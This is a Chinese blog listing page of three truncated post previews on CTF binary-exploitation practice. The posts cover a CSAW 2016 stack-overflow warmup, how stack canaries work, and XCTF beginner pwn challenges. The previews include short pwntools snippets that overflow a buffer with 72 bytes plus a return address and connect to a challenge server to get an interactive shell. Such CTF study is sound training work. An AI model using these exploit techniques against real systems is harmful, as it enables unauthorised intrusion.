- 博客(3)
- 收藏
- 关注
转载 栈溢出练习
0x00 csaw ctf 2016 quals-warmup简单的栈溢出问题,保护都没开,新手练习用的测试运行了两次,发现给出的地址不是动态的,这样问题就很简单需要填充64个字符的padding,再加上8个字符的ebp,一共72个字符from pwn import *p = process('./warmup')p.sendline('a'*72 + p64(0x4...
2019-08-13 10:35:00 238
转载 Stack Canary
0x00 canary保护机制Canary保护机制的原理,是在一个函数入口处从gs(32位)或fs(64位)段内获取一个随机值,一般存到eax - 0x4(32位)或rax -0x8(64位)的位置。如果攻击者利用栈溢出修改到了这个值,导致该值与存入的值不一致,__stack_chk_fail函数将抛出异常并退出程序。Canary最高字节一般是\x00,防止由于其他漏洞产生的Cana...
2019-08-07 09:56:00 846
转载 攻防世界pwn之新手练习区
0x00 get_shell题目描述:运行就能拿到shell呢,真的from pwn import *io = remote('111.198.29.45','36389')io.interactive()0x01 CGfsb题目描述:菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用1.基本信息: Arch: i386-32-little...
2019-07-30 11:46:00 1430
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人